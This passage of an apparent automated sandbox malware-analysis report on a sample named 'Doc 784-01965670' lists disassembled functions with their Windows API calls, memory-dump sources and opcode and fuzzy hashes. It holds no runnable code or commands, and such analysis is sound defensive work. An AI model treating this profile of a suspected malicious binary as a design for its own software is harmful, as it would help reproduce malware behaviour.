                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                                                    • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                                                                                    • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                                                    • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                                                                                    Function 0045552E Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1640429340-0
                                                                                                                                    • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                                    • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                                                                                    • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                                    • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                                                                                    Function 00467E5E Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3354276064-0
                                                                                                                                    • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                                                                    • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                                                                                    • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                                                                    • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                                                                                    Function 00455080 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 752480666-0
                                                                                                                                    • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                                    • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                                                                                    • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                                    • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                                                                                    Function 00455212 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3275902921-0
                                                                                                                                    • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                                    • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                                                                                    • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                                    • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                                                                                    Function 00439326 Relevance: 9.1, APIs: 6, Instructions: 72processCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                                                                                    • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                                                                                    • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1413079979-0
                                                                                                                                    • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                                    • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                                                                                    • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                                    • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                                                                                    Function 0041415E Relevance: 9.1, APIs: 6, Instructions: 71threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                                                                                    • __calloc_crt.LIBCMT ref: 0041419B
                                                                                                                                    • __getptd.LIBCMT ref: 004141A8
                                                                                                                                    • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                                                                                    • __dosmaperr.LIBCMT ref: 00414201
                                                                                                                                      • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                      • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1803633139-0
                                                                                                                                    • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                                    • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                                                                                    • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                                    • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                                                                                    Function 004555E0 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3275902921-0
                                                                                                                                    • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                                    • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                                                                                    • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                                    • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                                                                                    Function 004554B5 Relevance: 9.1, APIs: 6, Instructions: 62windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32 ref: 004554DF
                                                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3691411573-0
                                                                                                                                    • Opcode ID: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                                                                                    • Instruction ID: 46bf5c356378f1810468ef4d8dfe2f1c399e91f4bdd480ef4a2643e810f8fbb4
                                                                                                                                    • Opcode Fuzzy Hash: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                                                                                    • Instruction Fuzzy Hash: 8B1108713047419BC710DF68DDC8B2A77A8BB14322F400A6AFD14DB2D2D778DC498769
                                                                                                                                    Function 0043609C Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1814673581-0
                                                                                                                                    • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                                    • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                                                                                    • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                                    • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                                                                                    Function 00436272 Relevance: 9.1, APIs: 6, Instructions: 59sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                    • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                                    • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                                                                                    • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                                    • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                                                                                    Function 004471EC Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                      • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                      • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 00447227
                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                                                                                    • EndPath.GDI32(?), ref: 0044724E
                                                                                                                                    • StrokePath.GDI32(?), ref: 0044725C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 372113273-0
                                                                                                                                    • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                                    • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                                                                                    • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                                    • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                                                                                    Function 00410940 Relevance: 9.0, APIs: 6, Instructions: 49keyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Virtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                    • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                                    • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                                                                                    • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                                    • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                                                                                    Function 0044CBD3 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(00000000), ref: 0044CBEF
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                    • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                                    • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                                                                                    • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                                    • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
